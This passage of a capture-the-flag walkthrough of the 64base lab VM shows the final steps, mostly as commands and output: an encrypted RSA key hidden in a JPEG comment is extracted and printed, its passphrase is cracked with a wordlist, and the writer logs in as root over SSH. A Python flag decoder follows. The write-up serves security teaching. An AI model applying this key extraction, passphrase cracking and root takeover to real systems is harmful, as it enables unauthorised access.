Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
 23:37:55 up 0 min, 0 users, load average: 0.39, 0.12, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
=> Got it!!!

22. Check what is inside /admin
$ cd /var/www/html/admin
$ ls
S3cR37 index.php
$ cd S*
$ ls
flag5{TG9vayBJbnNpZGUhIDpECg==}
=> Got flag 5!
$ echo "TG9vayBJbnNpZGUhIDpECg==" | base64 -d
Look Inside! :D

23. Check the file
=> The flag is a file, not a directory. Serve it from the reverse shell and pull it over:
$ python -m SimpleHTTPServer
(kali) download the flag (SimpleHTTPServer listens on 8000) and save it as flag5.jpg for the next step
(kali) $ file flag5{TG9vayBJbnNpZGUhIDpECg==}
flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d39", baseline, precision 8, 960x720, frames 3
=> The JPEG comment holds another hex string (file(1) truncates it). Unhexed, it starts with "LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQ", which is base64 for "-----BEGIN RSA PRIVATE KEY-----", so the whole comment is hex(base64(PEM)). Extract it!

24. Extract the comment
$ exiftool -b -Comment flag5.jpg | xxd -r -p | base64 -d > id_rsa.priv
$ chmod 600 id_rsa.priv
$ cat id_rsa.priv
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
+T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
+j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
/Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
-----END RSA PRIVATE KEY-----
=> exiftool -b prints the raw tag value; a sed on "Comment : " would not match exiftool's column-padded output. The chmod is needed because ssh ignores a private key that is readable by others. Proc-Type: 4,ENCRYPTED means the key is passphrase-protected.

25. Try to use it
=> Port 62964 is the real sshd found in step 4, and root is the obvious target.
$ ssh -p 62964 -i id_rsa.priv root@192.168.56.103
Enter passphrase for key 'id_rsa.priv':
=> Passphrase?
Try 64base5h377... Fail...

26. Bruteforce the passphrase with http://www.leidecker.info/projects/phrasendrescher/
$ pd pkey -d /usr/share/wordlists/rockyou.txt -K ./id_rsa.priv
phrasen|drescher 1.2.2b - the passphrase cracker
Copyright (C) 2008 Nico Leidecker; http://www.leidecker.info
password for ./id_rsa.priv: usetheforce
finished! bye, bye..
=> Yeah!! It's the same phrase as in the flag5 JPEG. (ssh2john + john --wordlist does the same job if phrasendrescher isn't at hand.)

27. Finish it!
$ ssh -p 62964 -i id_rsa.priv root@192.168.56.103
Enter passphrase for key 'id_rsa.priv': usetheforce
Last login: Wed Dec 14 22:01:32 2016 from 192.168.56.101
flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
root@64base:~#
=> Yeah, root!
=> flag6 is base64 of hex of base64 of hex of base64 (each layer made with base64 / xxd -p, trailing newlines included), so peel it in reverse order:
$ echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d
base64 -d /var/local/.luke|less.real
=> The result is itself a command to run on the box:
$ base64 -d /var/local/.luke|less.real
....
[ASCII-art banner reading "NOW YOU'RE A JEDI!"]

I hope you enjoyed this challenge
Please leave comments & feedback @ https://www.vulnhub.com/?q=64base
-----------------------------------
64Base Challenge by 3mrgnc3
https://3mrgnc3.ninja/challenges
-----------------------------------
=> Finished!!!
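Every flag on this box was peeled by hand with echo | xxd -r -p | base64 -d chains: flags 2 to 5 in steps 16 to 22, and the five-layer flag6 in step 27. As an added example, not part of the original write-up or of the 64base VM, here is the same procedure as one loop: it recognises a flagN{...} wrapper, a hex layer or a base64 layer, applies the matching decoder, and stops as soon as what remains is plain text. The sample blobs are copied from the steps above; wrap() is only there to rebuild such chains (it is how a flag6-style blob can be regenerated for testing), and nothing here talks to the target.

```python
"""Peel the nested hex / base64 / flagN{} layers used by the 64base flags."""
import base64
import binascii
import re

FLAG_RE = re.compile(r"^(flag\d+)\{([^{}]*)\}$")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Copied from the write-up above: the hex blob found in index.php (step 16)
# and the flags printed by login.php, the command shell and /admin (steps 18-22).
SAMPLES = {
    "index.php hex": "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a64575658"
                     "4f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c325271"
                     "4d544a54626d51315a45566157464655614446525557383966516f3d0a",
    "flag3": "flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}",
    "flag4": "flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}",
    "flag5": "flag5{TG9vayBJbnNpZGUhIDpECg==}",
}


def _as_text(raw):
    """Accept a decoded layer only if it is printable text (newlines allowed,
    so a PEM key such as the one in the flag5 JPEG passes too)."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    text = text.strip()
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def _try_hex(s):
    """xxd -r -p equivalent: an even number of hex digits, nothing else."""
    if len(s) % 2 or not HEX_RE.match(s):
        return None
    return _as_text(binascii.unhexlify(s))


def _try_b64(s):
    """base64 -d equivalent, strict: alphabet only, length a multiple of 4."""
    if len(s) % 4 or not B64_RE.match(s):
        return None
    try:
        return _as_text(base64.b64decode(s, validate=True))
    except binascii.Error:
        return None


def peel(blob):
    """Strip flagN{...} wrappers, hex and base64 layers until plain text remains.

    Returns (flags, text, steps): the flag names seen, the innermost text and
    the decoder applied at each layer. Hex is tried before base64 because the
    hex alphabet is a subset of the base64 alphabet; the printable check
    rejects the wrong interpretation when a blob is ambiguous.
    """
    flags, steps, cur = [], [], blob.strip()
    while True:
        m = FLAG_RE.match(cur)
        if m:
            flags.append(m.group(1))
            steps.append("flag")
            cur = m.group(2).strip()
            continue
        for name, decode in (("hex", _try_hex), ("base64", _try_b64)):
            out = decode(cur)
            if out is not None:
                steps.append(name)
                cur = out
                break
        else:
            return flags, cur, steps


def wrap(text, layers):
    """Inverse of peel, for building blobs: apply "base64" / "hex" in order,
    appending the newline that the base64 and xxd -p command-line tools emit."""
    data = text.encode()
    for layer in layers:
        data = (base64.b64encode(data) if layer == "base64" else binascii.hexlify(data)) + b"\n"
    return data.decode().strip()


if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        flags, text, steps = peel(blob)
        print(f"{label}: {' -> '.join(steps)} => {flags} {text!r}")
```

Two details matter in practice. Each layer is stripped of surrounding whitespace before the next decode, because the trailing newline that base64 and xxd -p add would otherwise break the strict base64 length check. And the loop stops on a printable-text criterion rather than on a fixed depth, which is what lets the same function handle the single-layer flags and the five-layer flag6 without being told which is which.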